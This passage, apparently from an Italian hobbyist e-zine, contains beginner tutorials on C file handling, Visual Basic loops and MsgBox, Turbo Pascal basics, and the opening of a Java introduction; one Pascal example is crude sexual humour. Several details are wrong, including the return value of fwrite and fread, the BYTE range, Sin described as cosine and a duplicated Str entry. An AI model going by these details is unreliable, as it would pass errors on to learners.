l'array. sizeof(inumeri[0]) ci da la dimensione di uno solo degli elementi dell'array, mentre il terzo argomento (100) dice alla funzione di registrare 100 dati della dimensione sizeof(inumeri[0]), dato che vogliamo registrare tutto l'array, composto appunto da 100 elementi. fwrite ha come valore di ritorno il numero di bytes che e' riuscito effettivamente a scrivere nel file. La funzione per leggere da un file corrispondente a fwrite e' fread, alla quale dobbiamo passare gli stessi argomenti di fwrite. Se ad esempio volessimo rileggere l'array salvato con l'esempio precedente... #include <stdio.h> main(){ FILE *ilfile; int inumeri[100]; ilfile = fopen("prova.prv","rb"); fread(inumeri,sizeof(inumeri[0]),100,ilfile); fclose(ilfile); } Come avrete gia' capito, fread ritorna invece il numero di bytes che e' riuscito a leggere dal file (utile per accorgersi di un errore se il numero e' inferiore a quello richiesto) Un grosso vantaggio di fwrite e fread e' che fanno parte dello standard ANSI, e garantiscono quindi una certa portatilita' ai programmi che accedono ai file unicamente con queste due funzioni. Per leggere o scrivere un solo carattere si usano invece putc e getc. Es. ilcarattere = getc(ilfile); putc(ilcarattere,ilfile2); Spesso capita di voler usare un ciclo generico per gestire file forniti dall'utente. In questo caso possiamo usare la funzione feof(FILE *stream) per controllare se il file e' terminato (la funzione ritorna nonzero) o no (la funzione ritorna 0), con qualcosa di questo tipo : while (!feof(inputf)){ fgetc(inputf); } -------Passiamo ora a vedere come accedere ad un file in modo random. Mentre in un file sequenziale leggevamo o scrivevamo byte uno dopo l'altro, possiamo immaginare un file random come un insieme di elementi numerati, chiamati record. Il vantaggio e' possiamo accedere direttamente al record che ci interessa, ricordando pero' che tutti i record devono essere della stessa dimensione. Anche se il C non fa differenza tra i due tipi di file, di solito si accede ad un file random in modo binario con fwrite e fread. Quindi per accedere in lettura e scrittura apriremo il file in modo "r+b" se il file esiste gia', in modo "w+b" se vogliamo crearlo. Per accedere ad un certo record dobbiamo conoscerne la posizione nel file ed andarci con la funzione fseek. Es. #include <stdio.h> main(){ FILE *ilfile; ilfile = fopen("prova.prv","rb"); fseek (ilfile,56L,SEEK_SET); fclose(ilfile); } In questo caso va al byte 56 (L = in formato Long) di ilfile, a partire da SEEK_SET, cioe' dall'inizio del file. SEEK_SET = inizio del file SEEK_CUR = posizione corrente SEEK_END = fine del file Noi pero' non vogliamo raggiungere un qualsiasi byte del file, ma l'inizio del record che ci interessa. Per fare cio' dovremo usare sizeof. fseek(ilfile,(long)numerodelrecord*sizeof(record),SEEK_SET); _____________________________________________________________________________ OOOPS! Una cosa che doveva essere spiegata nella prima parte : il cast scrivendo tra parentesi un tipo di variabili forziamo il compilatore a considerare un valore come se fosse di quel tipo. In questo caso e' necessario dato che fseek si aspetta come secondo argomento un valore di tipo long _____________________________________________________________________________ Passiamo a un altro esempio. Se volessimo salvare i dati delle automobili di quel gioco.... #include <stdio.h> struct automobile{ char *nome; int velmax; long soldi; }; main(){ FILE *ilfile; struct automobile automobili[10]; ilfile = fopen("automob.sav","w+b"); fwrite(automobili,sizeof(automobile),10,ilfile); fclose(ilfile); } In questo caso ogni record rappresenta i dati di un automobile. Per accedere al terzo record scriveremo : struct automobile auto1; fseek(ilfile,(long)2*sizeof(auto1),SEEK_SET); fread(&auto1,sizeof(auto1),1,ilfile); Ci ritroveremo cosi' nella variabile auto1 i dati dell'automobile numero 3. Ecco, mi sembra di aver spiegato le cose di base sulla gestione dei file. Per piacere non mi e-mailate per dirmi che ho dimenticato di spiegare qualcosa. Questo e' solo un tutorial con il quale cerco di spiegare il C a chi non lo conosce, ma le cose piu' importanti si imparano sperimentando da soli. Se trovate questo tutorial troppo scemo, vi ricordo che questo tutorial DEVE cominciare da zero (e conoscendo la mia coerenza c'e' da scommettere che non andra' troppo lontano :) Se invece trovate questo tutorial troppo difficile..... e che cazzo! It's impossible!!!!! ElectroRipper ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ VB TUTORIAL [ SECONDA PARTE ] ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Bene, bene.... a quanto pare si continua!!!! Sperando che abbiate capito qualcosa dal primo numero (ricordatevi che potete scrivermi per qualsiasi cosa [ma ricordate che sono un NewBie] a [email protected]) .... si riparte!!! L'altra volta abbiamo accennato ai cicli, ed abbiamo visto il ciclo FOR (che, spero lo abbiate gia' capito, serve per quei cicli che vanno eseguiti un numero preciso di volte). Oggi parliamo del ciclo DO/LOOP. La principale differenza e' che qui non sappiamo quante volte il ciclo verra' eseguito, e ne usciremo solo al verificarsi di una certa condizione. Ad esempio: Sub Prova() Dim Risposta as Integer Do Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova") Loop Until Risposta = 7 End Sub Prima il MsgBox.... questa istruzione crea una finestra di messaggio. La sintassi e': MsgBox(prompt[, buttons] [, title] [, helpfile, context]) dove: prompt --> E' il messaggio che sara' visualizzato buttons --> (facoltativa) Indica i pulsanti che saranno visualizzati (vedi tabella dopo) title --> (facoltativa) E' il titolo della finestra helpfile--> (facoltativa) Indica il file di guida utilizzato per le informazione relative al contesto context --> (facoltativa) Indica il numero del contesto a cui si fa riferimento nel file guida Se viene usato helpfile, context diventa obbligatorio e viceversa (non ho mai utilizzato queste due opzioni, diciamo che sono qui per completezza di informazione, hehehe) La variabile "buttons" A seconda dei pulsanti che si vogliono visualizzare VbOKOnly VbOKCancel VbAbortRetryIgnore Ignora. VbYesNoCancel VbYesNo VbRetryCancel 0 1 2 Visualizza solo il pulsante OK. Visualizza i pulsanti OK e Annulla. Visualizza i pulsanti Termina, Riprova, e 3 4 5 Visualizza i pulsanti Si', No e Annulla. Visualizza i pulsanti Si' e No. Visualizza i pulsanti Riprova e Annulla. A seconda di come apparira' la finestra VbCritical VbQuestion VbExclamation VbInformation 16 32 48 64 Visualizza Visualizza Visualizza Visualizza l'icona l'icona l'icona l'icona di di di di messaggio richiesta messaggio messaggio critico. di avviso. di avviso. di informazione. A seconda del pulsante predefinito VbDefaultButton1 VbDefaultButton2 VbDefaultButton3 VbDefaultButton4 0 256 512 768 Il Il Il Il primo pulsante e' il predefinito. secondo pulsante e' il predefinito. terzo pulsante e' il predefinito. quarto pulsante e' il predefinito A seconda se la scelta e' obbligatoria per l'applicazione o il sistema VbApplicationModal 0 VbSystemModal 4096 Scelta obbligatoria nell'applicazione. L'utente deve rispondere prima di poter continuare a lavorare nell'applicazione corrente. Scelta obbligatoria nel sistema. Tutte le applicazioni vengono sospese fino a quando l'utente non risponde. La variabile buttons deriva dalla somma delle opzioni corrispondenti alle nostre scelte. Ad esempio: se voglio visualizzare solo il pulsante OK, in stile di messaggio critico e con priorita' sul sistema assegnero' il valore 4112 dato da 0 + 16 + 0 + 4096 se voglio visualizzare i pulsanti SI e NO, senza stile, con pulsante predefinito il 2ø (NO), con priorita' solo sull'applicazione assegnero' il valore 260 dato da 4 + 0 + 256 + 0 ... ... Per ogni gruppo e' possibile scegliere un'opzione (intendo dire che non e' possibile mettere il primo pulsante come predefinito e pure il terzo, 8|; oppure mettere come stile sia il messaggio di avviso che quello critico), e il valore finale e' dato dalla loro somma (come gia' detto). Inoltre e' possibile sostituire il valore con la costante associata (VbQuestion e' la costante 32 che si riferisce allo stile di richiesta di avviso). In questo caso, piu' opzioni vengono gestite con l'operatore "+". Ad esempio: MsgBox "Prova", VbYesNo + VbSystemModal, "Titolo Prova" Infine l'istruzione include le parentesi quando e' una funzione (cioe' restituisce un risultato). Quindi: Variabile = MsgBox ("Testo", VbYesNo) --> visualizza la finestra e memorizza la risposta in Variabile Msgbox "Testo", VbYesNo --> visualizza la finestra I possibili risultati sono: Costante Valore Significato vbOK 1 OK vbCancel 2 Annulla vbAbort 3 Termina vbRetry 4 Riprova vbIgnore 5 Ignora vbYes 6 Si' vbNo 7 No OOPS... mi sono dilungato un po. Torniamo al ciclo. Come potete vedere, il ciclo visualizza una finestra di messaggio finche' non premiamo il pulsante NO. La parola UNTIL indica che il ciclo e' eseguito quando la condizione e' FALSA (infatti, come diventa vera, usciamo dal ciclo) Questa puo essere sostituita dalla parola WHILE che ha esattamente la funzione opposta: il ciclo verra' eseguito quando la condizione e' VERA. Quindi ad esempio, questo listato risulta uguale a quello precedente: Do Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova") Loop While Risposta = 6 Viene controllato che risposta sia uguale a 6 (SI) e, se vero, il ciclo si ripete. In questi casi, pero, si entra nel ciclo sempre almeno una volta.... potremmo pero' non volere eseguire il ciclo nemmeno una volta. Possiamo quindi mettere la condizione di esecuzione del ciclo all'inizio: Do While Risposta = 6 Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova") Loop Con questo listato per entrare nel ciclo la variabile Risposta deve gia' avere il valore 6, altrimenti le istruzioni all'interno del ciclo saranno completamente ignorate e l'esecuzione del programma riprendera' dall'istruzione seguente LOOP. Anche in questo caso e' possibile usare WHILE o UNTIL. Infine diciamo che la condizione puo' essere composta da piu' relazioni legate da operatori logici. Ad esempio con "Do While Risposta = 6 And Fine = 1" il ciclo viene eseguito solo se Risposta e' uguale a 6 E Fine e' uguale ad 1; basta che una delle due condizioni sia falsa per uscire dal ciclo. Gli relazioni possono essere anche a carattere gerarchico (cioe' si possono utilizzare le parentesi). Do While Risposta = 6 And (Fine = 1 Or Inizio = 1) Non vi dico il significato di questa istruzione.... cercate di capire quando si esce dal ciclo!!!! Ecco i principali operatori logici che potete usare in Visual Basic: *** AND Espressione1 Espressione2 Risultato True True True True False False False True False False False False Restituisce True solo se tutte le espressioni hanno valore True *** OR Espressione1 True True False False Restituisce True solo Espressione2 Risultato True True False True True True False False se almeno una delle espressioni ha valore True *** NOT Espressione Risultato True False False True Inverte il valore della variabile *** XOR Espressione1 True True False False Restituisce True se i Espressione2 True False True False due valori sono Risultato False True True False diversi tra loro *** IMP Espressione1 Espressione2 Risultato True True True True False False False True True False False True Mai usato... se qualcuno capisce in base a che principio funziona me lo dica;p (la guida dice: "Utilizzato per stabilire un'implicazione logica tra due espressioni") *** EQV Espressione1 Espressione2 True True True False False True False False Praticamente l'opposto di XOR Risultato True False False True Prima di finire con i cicli diciamo che possono essere nidificati (cioe' uno dentro un altro) e che, in quel caso, l'istruzione di chiusura (LOOP per il ciclo DO, NEXT per il ciclo FOR) si riferisce all'inizio piu' vicino ancora aperto: DO {istruzioni} DO {altre_istruzioni} LOOP LOOP Il primo LOOP si riferisce al secondo DO (quello aperto piu' vicino) e lo chiude... il secondo LOOP chiude il primo DO. N.B. Quando chiudete un ciclo FOR ricordate di mettere il giusto contatore vicino all'istruzione NEXT o verra' generato un errore. E anche questa e' fatta!!! I cicli principale sono questi. Passiamo ora all'esecuzione condizionale. Si tratta semplicemente di istruzioni che vengono eseguite solo se si verificano (o meno) certe condizioni. La prima e' sicuramente l'IF. Sub Main() Dim Risposta as integer Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova") If Risposta = 6 then MsgBox "Ok, let's go on" End If End Sub In questa routine chiediamo se si vuole continuare e se la risposta e' SI viene visualizzata un'altro messaggio. La struttura e': If condizione1 then {blocco_istruzioni1} Else {blocco_istruzioni2} End If Se la condizione risulta vera, verra' eseguito il blocco_istruzioni1; se falsa, il blocco_istruzioni2. ELSE indica quello che deve essere fatto se la condizione risultasse falsa (e' opzionale, vedi l'esempio). E' possibile controllare diverse condizioni, ad esempio: If condizione1 then {blocco_istruzioni1} ElseIf condizione2 then {blocco_istruzioni2} Else {blocco_istruzioni3} End If In questo caso se condizione1 e' falsa viene controllata condizione2 che, se vera, portera' all'esecuzione del blocco_istruzioni2. Se sono tutte false si esegue l'ELSE. E' possibile mettere tutti gli ELSEIF che si vuole e l'ELSE verra' eseguito solo se TUTTI i precedenti risultano essere falsi. Anche le IF, naturalmente, possono essere nidificate, e in questo caso ogni End If si riferisce all'If piu' vicino ancora aperto. Tra le condizioni, come nel ciclo DO/LOOP, e' possibile mettere delle relazioni logiche utilizzando gli operatori sopra descritti (ad es. If A = 1 Or B = 2 then.....). Esiste inoltre un metodo per valutare una variabile e reagire di conseguenza: Select Case variabile Case controllo1 {Istruzioni1} Case controllo2 {Istruzioni2} ... ... Case Else {Istruzioni_Else} End Select variabile e' cio' che viene messo a confronto con i vari CASE. Se variabile corrisponde ad esempio a controllo1 verra' eseguito istruzioni1, e cosi' via... Se nessun controllo da esito positivo viene eseguito il CASE ELSE (facoltativo). Ad esempio: Select Case Voto Case 10 MsgBox "Bravo" Case 6 to 9 MsgBox "Bravetto" Case 3, 4, 5 MsgBox "Applicati" Case is < 3 Msgbox "SFATICATO!!!!" Case Else MsgBox "Errore" End Select In questo esempio si vedono le sintassi che possono avere i CASE: 1ø Case 10 --> Controlla se e' uguale a 10 2ø Case 6 to 9 --> Controlla se appartiene all'intervallo da 6 a 9 3ø Case 3, 4, 5 --> Controlla se e' uguale a 3, a 4 o a 5 (avremmo potuto scrivere CASE 3 to 5) 4ø Case is < 3 --> Controlla se e' minore di 3 Come parametro per il CASE e' possibile mettere un valore (1ø), un intervallo (2ø), o piu' condizioni staccate da una virgola (3ø). E' infine possibile utilizzare la parola chiave IS con gli operatori di confronto =, >, =>, <, <= (4ø) R0n|n ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ PASCAL TUTORIAL [ PRIMA PARTE ] ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ _____ /(_ _) _____ ____ _ _ ÿ\ ( ) /( ___ ) (ÿ( )ÿ ( ) ( \ÿ\( ) /( ( ) ) )ÿ) (ÿÿ ( )( \ÿ( ) \( (___) ) (ÿ( \ÿÿ( ) ( \(_) \(_____) \ÿ\ \ÿ( ) ( ) ) ) ) |\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/| | Corso a puntate di Turbo Pascal | |/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\| | ×××××××××××××××××××××××××××××××××× | | | | × Le cose fondamentali da sapere × | |____________××××××××××××××××××××××××××××××××××__________________________| Imparare un linguaggio di programmazione non e' mai facilee spesso si ricorre a studiarli forzatamente per necessita'.Ora, sperando che lo finisca, vi presentero' un corso basatosu uno dei linguaggi di programmazione fondamentali, non percio' che riesce a fare ma per il semplice motivo che e' stato uno dei primi linguaggi di programmazione a livello alto. A noi non interessa tanto sfruttarlo per nostre applicazioni mabensi' come base che ci fara' capire come funziona un linguaggio di programmazione un po' piu' complesso.Allora, credo che a questo punto possiamo iniziare:(Azz! Ho finito le siga...e pensare che le ho comprate 6 ore fa..sigh!)Un programma in Pascal, che utilizza solo le istruzioni di base, e' formato generalmente da tre sezioni:--INTESTAZIONE----DICHIARAZIONI----ISTRUZIONI--Nell'intestazione viene specificato il nome del programma.Nelle dichiarazioni vengono descritti in modo formale glioggetti su cui il programma dovra' operare.Nelle istruzioni abbiamo le operazioni in cui vengono descrittele azioni da compiere, collegandole tra loro con opportune strutture di controllo. Ecco lo schema: PROGRAM NOMEDELPROGRAMMA; <-----INTESTAZIONE ......<-----DICHIARAZIONI ...BEGIN... ......<----- ISTRUZIONI (ALLINEATE SEMPRE SOTTO IL TERZO CARATTERE) ...END. <----- INDICA LA FINE DEL PROGRAMMA (QUANDO C'E' IL . ) Di solito l'intestazione viene ignorata dalla cpu mentre nell'end finale ci vuole sempre il punto. ->DICHIARAZIONI<In un programma che usa solo le strutture di base, questa sezione e' divisa in tre part:La dichiarazione dei moduli usati dal programma (clausola USES) La dichiarazione delle costanti (clausola CONST) La dichiarazione delle variabili (clausola VAR)-->LA DICHIARAZIONE DEI MODULI<--Il Pascal, come succede ormai per la maggior parte dei linguaggi, mette a disposizionedel programmatore diverse librerie di sottoprogrammi di utilita'(moduli).Tra i moduli standard ricordiamo:¹ Il modulo Crt, che contiene le procedure e funzioni che consentono di sfruttare in modo piu' efficiente le potenzialita' della tastiera e del video² Il modulo Printer, che contiene le procedure necessarie alla gestione della stampante³ Il modulo Graph, contenente tutte le procedure e le funzioni legate alla gestione grafica dello schermoLa sintassi della dichiarazione di uno o piu' moduli e' questa:USES nome del modulo,nome del modulo,....,nome del modulo ;-->La dichiarazione delle costanti<-In Pascal e' possibile gestire due classi di costanti: quelle espresse da noi nel programmaattraverso assegnazione e quelle che vengono dichiarate nella sezione di dichiarazione e sono precedute dalla parola chiave CONST.ES.CONST gravita':=9.81; pigreco:=3.14 ;-->La dichiarazione delle variabili<-Tutte le variabili usate nel programma devono essere dichiarate, con l'indicazione del tipo,nell'apposita sezione che inizia con la parola chiave VAR.Ecco la sintassi:Var nome della variabile:tipo; nome della variabile,... ..,nome della variabile:tipo;Il nome della variabile e' attribuito da noi, mentre il tipo dobbiamo sceglierlo tra i seguenti: ____________________________________________________________________ | TIPO DESCRIZIONE OCCUPAZIONE | |____________________________________________________________________| | | CONTIENE I NUMERI COMPRESI TRA | | | BYTE | 1 A 255 | 1 BYTE | | | | | |________|_____________________________________|_____________________| | | PERMETTE DI RAPPRESENTARE TUTTI I | | | REAL | VALORI DECIMALI COMPRESI TRA: | 6 BYTE | | | ±2.9 * 10 ^-38 A ±1.7 * 10^38 | | |________|_____________________________________|_____________________| | | CONSENTE DI RAPPRESENTARE VALORI | | |INTEGER | INTERI RELATIVI COMPRESI TRA: | 2 BYTE | | | -32768 E +32767 | | |________|_____________________________________|_____________________| | | CONSENTE DI RAPPRESENTARE GLI INTERI| | |LONGINT | COMPRESI TRA: | 4 BYTE | | | -2147473648 E +2147483647 | | |________|_____________________________________|_____________________| | | PERMETTE DI RAPPRESENTARE TUTTI | | | CHAR | I CARATTERI APPARTENENTI | 1 BYTE | | | ALL'ALFABETO ASCII | | |________|_____________________________________|_____________________| | | PERMETTE DI RAPPRESENTARE UNA | | | STRING | QUALSIASI SEQUENZA DI CARATTERI LA | FINO A 255 BYTE | | | CUI LUNGHEZZA VARIA DA 1 A 255 | | |________|_____________________________________|_____________________| | | PERMETTE DI RAPPRESENTARE I DUE | | |BOOLEAN | VALORI LOGICI TRUE E FALSE | 1 BYTE | | | | | |________|_____________________________________|_____________________| -->L'ASSEGNAZIONE<-L'assegnazione permette di memorizzare un valore in una locazione di memoria. La sintassi e' questa:nome della variabile:=valore o espressione;Non dimenticate che ogni assegnazione va chiusa con il punto e virgola. -->LE PROCEDURE DI INPUT/OUTPUT<-La procedura che in Pascal consente di acquisire dati attraverso tastiera e' READLN. La sintassi e' questa: READLN(VARIABILE); oppure READLN(VARIABILE1,VARIABILE2,...,VARIABILEn);La cpu attende che l'operatore digiti qualcosa da memorizzare nella rispettivalocazione di memoria. Anche quest'istruzione ha bisogno di essere chiusa da un punto e virgola. L'istruzione per visualizzare un messaggio di output sullo schermo e' WRITELN. Sintassi: WRITELN(NOME DELLA VARIABILE); oppure WRITELN(NOME DELLA VARIABILE,NOME DELLA VARIABILE2,...,NOME DELLA VARIABILEn); oppure WRITELN('CIAO LAMER');I primi due mostrano il contenuto delle variabili, mentre il terzo mostra un messaggio sullo schermo. Quando bisogna visualizzare un messaggio a video, il testo deve esserecontenuto tra due apici. Per ottenere, invece, l'output sulla stampante bisogna , quando dichiariamo i moduli, specificare il modulo PRINTER e usare l'opzione LST in questo modo: WRITELN(LST'sAlVe SoNo UnA sTaMpA') ;->LE ISTRUZIONI STRUTTURATE<Le istruzioni strutturate si dividono in tre tipi: »»»»SEQUENZA«««««»»»»SELEZIONE««««»»»»ITERAZIONE««« -->SEQUENZA<-La sequenza e' una struttura in cui le istruzioni strutturate che la compongono vengono eseguiteuna dopo l'altra nell'ordine indicato. In Pascal questa struttura e' racchiusa tra le istruzioniBEGIN e END e al suo interno ogni istruzione e' suddivisa dalla successiva attraverso il ; Faccio un esempio di un programma primitivo: PROGRAM UTENGLUONG; (* QUESTO E' UN COMMENTO *) VAR A,B,C:INTEGER; {ANCHE QUESTO} BEGIN WRITELN ('INSERISCI I DUE NUMERI DA SOMMARE'); READLN(A,B); (* LEGGE UN NUMERO CHE NON DEVE SUPERARE LA CIFRA ±32767 *) C:=A+B; (*CALCOLA LA SOMMA E LA MEMORIZZA NELLA VARIABILE C*) WRITELN ('LA SOMMA E'' ',C); (*STAMPA LA SOMMA*)END. ...IF A<0 .... CIOÉ SE A É MINORE DI 0 ...IF A=0 .... CIOÉ SE A É UGUALE A 0 ...IF A<=0 ... CIOÉ SE A É MINORE O UGUALE A 0 ...IF A>=0 ... CIOÉ SE A É MAGGIORE O UGUALE A 0 ...IF A<>0 ... CIOÉ SE A É DIVERSO DA 0 ... Esempio di un programma con selezione: PROGRAM UTENGTUOST; (* QUESTO PROGRAMMA CONFRONTA DUE NUMERI *) VAR A,B:INTEGER;BEGIN WRITELN ('INSERISCI DUE NUMERI'); READLN(A,B); IF A>B THEN WRITELN ('IL PIU'' GRANDE E'' ',A); (* VERIFICA SE A É MAGGIORE DI B O VICEVERSA *) IF A<B THEN WRITELN ('IL PIU'' GRANDE E'' ',B); IF A=B THEN WRITELN ('SONO UGUALI'); (* VERIFICA SE SONO UGUALI *)END. -->ITERAZIONE<-I cicli iterativi servono per ripetere piu' volte un determinato numero di istruzioni sotto ilcontrollo di una condizione booleana.Esistono tre tipi di cicli:il ciclo WHILE, il ciclo REPEAT e il ciclo FOR.Il ciclo WHILE esegue le istruzioni se la condizione e' vera ed esce se la condizione e' falsa.WHILE CONDIZIONE DO BEGIN ISTRUZIONI DA RIPETERE; END;Il ciclo REPEAT esegue le istruzioni se la condizione e' falsa ed esce se e' vera.REPEAT ISTRUZIONI DA RIPETERE;UNTIL CONDIZIONE;Il ciclo FOR e' simile al WHILE ma ripete fino a quando specificato nella condizione. FOR CONDIZIONE DO BEGIN ISTRUZIONI DA RIPETERE; END;Ogni ciclo possiede un contatore. Il contatore deve essere inizializzato fuori dal ciclo eaumentato dentro al ciclo o viceversa, tranne con il FOR.Ora vi mostro un programma che sfrutta tutti e tre i cicli: PROGRAM SONOUNFRISCONE; (* QUESTO PROG NON SERVE A NIENTE *) USES CRT; VAR K,CAZZO,I,VAGINA,SEGA:INTEGER; NOME:STRING[15]; (* IL 15 TRA [] SIGNIFICA CHE LA PAROLA PUo' ESSERE LUNGA 15 CARATTERI *) CHIAVAMI:BOOLEAN; BEGIN REPEAT (* CONTROLLA SE K E' MAGGIORE DI 0 *) WRITELN ('INSERISCI QUANTE TE NE VUOI CHIAVARE'); READLN(K); UNTIL K>0; WRITELN ('QUANTO CM CE L''HAI LUNGO?'); READLN(CAZZO); WRITELN ('QUANTI CM CE L''HA LARGA, LEI? '); READLN(VAGINA); IF CAZZO>VAGINA THEN SEGA:=CAZZO-VAGINA; IF VAGINA>CAZZO THEN SEGA:=VAGINA-CAZZO; IF SEGA>10 THEN WRITELN ('AHIAHIAHI SEI FUORI DALLA MEDIA, VEDIAMO DI RECUPERARE!'); DELAY(3000); (*QUESTO COMANDO SERVE PER ASPETTARE ALCUNI SECONDI PRIMA DI CONTINUARE *) CLRSCR; (* QUESTO COMANDO SERVE PER PULIRE LO SCHERMO *) WRITELN ('IL TUO CAZZO DOVREBBE ESSERE COSI'' '); DELAY(2000); (*ASPETTA UN ALTRO PO'*) WRITELN (''); WRITELN (' ___ ____ '); WRITELN (' / | \ '); WRITELN (' ( ) '); WRITELN (' \ / '); (* RIPETE IL CICLO DA 1 A SEGA*) FOR I:=1 TO SEGA DO WRITELN (' | | '); WRITELN (' / \ '); WRITELN (' ( ) '); WRITELN ('( () )'); WRITELN (' ( ( ( ) '); WRITELN (' ((( ))) '); DELAY(5000); (*MI SON ROTTO DI ASPETTARE*) CLRSCR; WRITELN ('COME TI CHIAMI?'); READLN (NOME); WRITELN ('ALLORA ',NOME,' CERCHIAMO DI FAR LUCE SU QUESTO CASO'); DELAY(3000); (*UFF*) I:=1; (* INIZIALIZZA IL CONTATORE AD 1 *) CHIAVAMI:=FALSE; (* INIZIALIZZA LA VARIABILE BOOLEANA A FALSE *) WHILE (I<=K) AND (CHIAVAMI=FALSE) DO BEGIN WRITELN ('IL ',I,'ø GIORNO TE NE TIRI ',SEGA); IF SEGA=0 THEN CHIAVAMI:=TRUE; (* SE SEGA E' UGUALE A ZERO DICHIARA F=TRUE*) SEGA:=SEGA-1; I:=I+1; END; (* IL CICLO SI FINISCE SE F É TRUE E SE I HA RAGGIUNTO K*)END. E' ovvio che guardando questo prog non riusciate a capire cosa faccia, vabbe' quello e' normale! Neanche io ho capito che fa! L'importante e' aver capito come funziano i cicli. Credo che per ora basta cosi', per il continuo mi raccomando non perdete di vistala rivista che se l'avete gia' vista avete preso una svista e per ora ben vista'.La prox volta vedremo le strutture non primitive, gli array e qualcos'altro...;-3Per ora sbizzaritevi con questi comandi ;-PABS(X)Calcola il valore assoluto di xArcTan(X)Calcola al'arcotangente in radianti di XChr(CODICE)Restituisce il carattere che ha il codice ASCII specificatoCopy(STRINGA,POSIZIONE,NUMEROCARATTERI)Estrae dalla stringa una sottostringa formata dal numero di caratteri specificatopresi a partire dalla posizione indicata.Cos(X)Calcola il coseno di un angolo in radiantiDelay (MILLISEC)Interrompe l'esecuzione del programma per il tempo specificato Delete(STRINGA,POSIZIONE,NUMEROCARATTERI)Elimina dalla stringa un certo numero di caratteri a partire dalla posizione specificata. Exp(X)Calcola il valore della funzione esponenziale e^xFrac(X)Calcola la parte frazionaria, compresa tra 0 e 1, di un numero realeInsert(NUOVA,ORIGINALE,POSIZIONE) Inserisce i caratteri della nuova stringa all'interno della stringa originaleInt(x)Calcola la parte intera di un numero realeLenght(STRINGA) Restituisce il numero di caratteri che compongono la stringaLn(X)Calcola il logaritmo naturaleOrd(CARATTERE)Restituisce il codice ASCII del caratterePi Restituisce il valore della costante pigreco con 18 cifre decimaliRandom(N) Resituisce un numero casuale intero compreso tra 0 e N-1RandomizeQuesta funzione si deve inizializzare se si vuole usare il comando RandomRound(X) Arrotonda un numero reale all'intero piu' vicinoSin(X)Calcola il coseno di un angolo in radiantiSqr(X)Calcola il quadratoSqrt(x)Calcola la radice quadrata di un numero realeStr(VALORE,STRINGA)Genera la stringa di caratteri corrispon dente al valore numerico specificatoStr(STRINGA,VALORE)Genera il valore corrispondente alla stringa di caratteri specificataTrunc(X)Elimina la parte decimale di un numero reale. T0rment0 [email protected] http://come.to/hackernovello ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ JAVA TUTORIAL [ PRIMA PARTE ] ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ che cos'e' java??? Java e' un linguaggio di programmazione molto simile al c++ o al pascal piuttosto che a un linguaggio di descrizione della pagina come HTML o a un semplice linguaggio di skript come JavaSkript. Piu' specifikatamente, java e' un linguaggio di programmazione orientato ad oggetti (come il Visual Basic)sviluppato dalla Sun MicroSystems, ispirato al C++ (quindi noterete molte somiglianze) ed e' stato progettato con lo scopo di ottenere un prodotto di piccole dimensioni, semplice e portabile su diverse piattaforme e sistemi operativi, sia a livello del kodice sorgente 